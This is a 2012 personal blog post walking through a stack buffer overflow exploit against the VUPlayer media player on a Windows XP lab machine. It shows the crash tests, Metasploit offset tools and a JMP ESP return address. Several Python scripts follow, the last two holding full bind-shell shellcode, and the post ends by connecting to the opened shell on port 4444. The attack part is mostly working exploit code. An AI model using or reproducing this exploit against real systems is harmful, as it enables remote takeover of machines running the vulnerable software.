Monday, February 13, 2012

Buffer Overflow - VUPlayer

Again, in this post I will try to exploit a software using the Buffer Overflow technique. The software is called VUPlayer.

Lets do some testing first to make the software crashed. That will be my attack vector. 

Alhamdulillah, this morning I'm succeeded to make the software crashed in the first try. Here's what I did.

- Of course installing VUPlayer in my Windows XP machine.

- Okay, I want to try adding url. (of course the url is not the valid one..  :P  )
- Making 1000 'A' character in notepad.


- Clicking "Add URL" menu on the player then insert the character.

- Click OK.
- Hmm.. the player seems still running. Lets increase the character 10 times into 10000 'A' character  >:)

- Again, insert it in the 'Add URL' section on the software.

- Click OK, and then.... 
- Booom, the software crashed..  :D

- Now lets see with OllyDbg when the software crashed whether the EIP is overflowed or not.
- Great, looks like this bug can be our door to exploit the system.
- Next step, I'll try to search the address where the EIP is overwritten. Lets go to metasploit directory to make a pattern.
# cd /pentest/exploits/framework/tools
- Because the software crashed when I make 10000 'A' character. I'll generate 10000 bytes character too this time.
# ./pattern_create 10000 > /var/www/files/pattern.txt

- Lets open it in the xp.

- Copy, then paste at the "Add URL" menu in the software.

- Here's what we will get.

- Back to the metasploit pattern tools. Now, we must use pattern_offset script to find the exact address.
# ./pattern_offset 68423768
 1012
# ./pattern_offset 8Bh9Bi0
1016

- Next step, lets try to overwrite the EIP with our word like "DEADBEEF" (again.)
- To help me do this, I make a fuzzer with a python language like this.
Fuzzer:
#!/usr/bin/python
file="agoes.txt"
dead="\x41" * 1012;
dead+="\xEF\xBE\xAD\xDE"
file=open(file,'w')
file.write(dead)
file.close()
- It will generate a file named "agoes.txt" that contain the junk character plus our DEADBEEF character.
- Lets execute it.

- Open it in the xp.

- Copy and then paste in the vuplayer.

- Here's what we got.

- Success..

- Okay, next I'll try to fill the ESP with NOP.
- Edit the fuzzer script become like this.
Fuzzer:
#!/usr/bin/python
file="agoes.txt"
dead="\x90" * 1012;
dead+="\xEF\xBE\xAD\xDE"
dead+="\x90"*(1016-len(dead))
dead+="\xCC"*(10000-len(dead))
file=open(file,'w')
file.write(dead)
file.close()
- Generate the file and then open in XP.
# python ./fuzz.py

- Copy, then paste in the vuplayer.

- Click Ok, and here's what we got.

- Looking good, next step. Searching the address of JMP ESP in the SHELL32.dll module.

- Here it is.

- Lets insert it to our fuzzer. Dont' forget to change it into little endian format.
7C9D30D7 = \xD7\x30\x9D\x7C
Fuzzer:
#!/usr/bin/python
file="agoes.txt"
dead="\x90" * 1012;
dead+="\xD7\x30\x9D\x7C"
dead+="\x90"*(1016-len(dead))
dead+="\xCC"*(10000-len(dead))
file=open(file,'w')
file.write(dead)
file.close()
- Before executing the script. Lets generate the payload too.
- Generating "Windows Bind Shell" payload using msfweb.
# cd /pentest/exploits/framework2/
# ./msfweb

- Final modification on the fuzzer script.
Fuzzer:
#!/usr/bin/python
file="agoes.txt"
dead="\x90" * 1012;
dead+="\xD7\x30\x9D\x7C"
dead+="\x90" * 32
dead+="\xb8\xc0\x1b\x71\xa9\x2b\xc9\xb1\x51\xda\xd1\xd9\x74\x24\xf4\x5f"
dead+="\x31\x47\x0e\x83\xef\xfc\x03\x87\x11\x93\x5c\xfb\x4c\xb8\xd2\xeb"
dead+="\x68\xc1\x12\x14\xea\xb5\x81\xce\xcf\x42\x1c\x32\x9b\x29\x9a\x32"
dead+="\x9a\x3e\x2f\x8d\x84\x4b\x6f\x31\xb4\xa0\xd9\xba\x82\xbd\xdb\x52"
dead+="\xdb\x01\x42\x06\x98\x42\x01\x51\x60\x88\xe7\x5c\xa0\xe6\x0c\x65"
dead+="\x70\xdd\xc4\xec\x9d\x96\x4a\x2a\x5f\x42\x12\xb9\x53\xdf\x50\xe2"
dead+="\x77\xde\x8d\x1f\xa4\x6b\xd8\x73\x90\x77\xba\x48\xe9\x5c\x58\xc5"
dead+="\x49\x53\x2a\x99\x41\x18\x5c\x05\xf7\x95\xdd\x3d\x59\xc2\x53\x73"
dead+="\x6b\xfe\x3c\x74\xa5\x98\xef\xec\x22\x56\x22\x98\xc5\xeb\x70\x07"
dead+="\x7e\xf3\xa5\xdf\xb5\xe6\xba\x24\x1a\x06\x94\x05\x13\x1d\x7f\x38"
dead+="\xce\xd6\x82\x6f\x7b\xe5\x7d\x5f\x13\x30\x88\xaa\x49\x95\x74\x82"
dead+="\xc1\x49\xd8\x79\xb5\x2e\x8d\x3e\x6a\x4e\xe1\xa6\xe4\xa0\xe3\x40"
dead+="\xa6\x49\x02\x19\x20\xee\xdf\x51\x76\xb9\x20\x47\x12\x56\x8e\x32"
dead+="\x1c\x86\x58\x18\x4f\x09\x70\x37\x6f\x80\xd1\xe2\x70\xfd\xbe\xe9"
dead+="\xc6\x78\x77\xa6\x27\x52\xd8\x1c\x8c\x0e\x26\x4c\xbf\xd9\x3f\x15"
dead+="\x06\x60\x97\x1a\x50\xc6\xe8\x34\x3b\x83\x72\xd2\xac\x30\x16\x93"
dead+="\xc8\xdd\xb8\xfa\x3b\xee\xb0\x1b\x51\xaa\x4b\x01\x97\xf2\xbf\x6f"
dead+="\x26\xb0\x12\x91\x95\x19\xfe\xe0\x60\x5a\xab\x51\x3f\xf2\xd9\x5b"
dead+="\xf3\x15\xe1\xd6\xb0\xe6\xcb\x43\x6e\x4b\xa5\x22\xc1\x01\x44\x95"
dead+="\xb0\x80\x17\xea\xe3\x43\x35\xcd\x01\x5a\x16\x12\xdf\x08\x66\x13"
dead+="\xd7\x33\x48\x60\x4f\x30\xea\xb2\x14\x37\x3b\x68\x2a\x17\xac\xf2"
dead+="\x0c\x7a\x5e\x59\x52\xad\x5e\x8d"
file=open(file,'w')
file.write(dead)
file.close()
- Generate the file then open in XP.

- Copy all code, then paste in vuplayer.

- Hmm...  still have to do some trial and error because it don't work.
- But there's this error everytime I open vuplayer with OllyDbg. Maybe this is the key. Have to research it..  :)


- After doing some research, I think maybe I should try use the JMP ESP address that located in the BASS module because this module seems suspicious and vulnerable.

- Change the fuzzer script a little.
Spoiler:
#!/usr/bin/python
file="agoes.txt"
dead="\x90" * 1012;
dead+="\xFF\xD0\x00\x10"
dead+="\x90" * 32
dead+="\xdb\xcc\xba\x37\xa5\xd6\xe2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x51"
dead+="\x31\x50\x17\x03\x50\x17\x83\xf7\xa1\x34\x17\x0b\xc3\x53\x95\x1b"
dead+="\xed\x5b\xd9\x24\x6e\x2f\x4a\xfe\x4b\xa4\xd6\xc2\x18\xc6\xdd\x42"
dead+="\x1e\xd8\x55\xfd\x38\xad\x35\x21\x38\x5a\x80\xaa\x0e\x17\x12\x42"
dead+="\x5f\xe7\x8c\x36\x24\x27\xda\x41\xe4\x62\x2e\x4c\x24\x99\xc5\x75"
dead+="\xfc\x7a\x0e\xfc\x19\x09\x11\xda\xe0\xe5\xc8\xa9\xef\xb2\x9f\xf2"
dead+="\xf3\x45\x4b\x0f\x20\xcd\x02\x63\x1c\xcd\x75\xb8\x6d\x36\x11\xb5"
dead+="\xcd\xf8\x51\x89\xdd\x73\x15\x15\x73\x08\x96\x2d\xd5\x67\x99\x63"
dead+="\xe7\x9b\xf5\x84\x21\x05\xa5\x1c\xa6\xf9\x7b\x88\x41\x8d\x49\x17"
dead+="\xfa\x8e\x7e\xcf\xc9\x9c\x83\x34\x9e\xa1\xaa\x15\x97\xbb\x35\x28"
dead+="\x4a\x4b\xb8\x7f\xff\x4e\x43\xaf\x97\x97\xb2\xba\xc5\x7f\x3a\x92"
dead+="\x45\xd3\x97\x49\x39\x90\x44\x2e\xee\xe9\xbb\xd6\x78\x07\x60\x70"
dead+="\x2a\xae\x79\xe9\xa4\x14\x63\x61\xf2\x02\x6b\x57\x96\xbc\xc2\x02"
dead+="\x98\x6d\x8c\x08\xcb\xa0\xa4\x07\xeb\x6b\x65\xf2\xec\x44\xe2\x19"
dead+="\x5b\xe3\xba\xb6\xa3\x3d\x6c\x6c\x08\x97\x72\x5c\x23\x7f\x6a\x25"
dead+="\x82\xf9\x23\x2a\xdc\xaf\x34\x04\x87\x25\xaf\xc2\x20\xd9\x42\x83"
dead+="\x54\x77\xcd\xca\xbf\x44\x64\x0b\xd5\x10\xfe\x31\x1b\x59\xf3\x1f"
dead+="\xa2\x1b\xd9\xa1\x19\xb0\xb2\xd0\xe4\xf0\x1f\x41\xb3\x69\x12\x6b"
dead+="\x77\x7f\x2d\xe6\x3c\x7f\x07\x53\xea\x2d\xf9\x32\x45\xb8\xf8\xe5"
dead+="\x34\x69\xaa\xfa\x67\xf9\xe1\xdd\x8d\x34\xaa\x22\x5b\xa2\xb2\x23"
dead+="\x53\xcc\x9d\x50\xcb\xce\x9d\xa2\x90\xd1\x74\x78\xa6\xfe\x11\x02"
dead+="\x80\x1d\x92\xa9\xcf\x34\xaa\x9d"
file=open(file,'w')
file.write(dead)
file.close()
- Generate the new file then open in XP.

- Wow, the character seems very strange.  :D
- Doesn't matter, copy it then paste in VUPlayer.

- Connect to the payload in port 4444 using telnet.
# telnet 192.168.56.101 4444


Finnally, Its working.. 
Exploitation successful.
(^_^)v  

"the quieter you become, the more you are able to hear.."

4 comments:

Rui Fujiwara said...

After I do with uncounting trial I have found a match payload!!! and After that I look your blog... awsome you find another way to exploit!!!

Ganbatte yo!

dragon-master said...

great..
glad to hear that.. :D

anyway, thanks for coming by... :)

robzlabz said...

great :)

dragon-master said...

thanks..
still have lot thing to study though.. :D

Post a Comment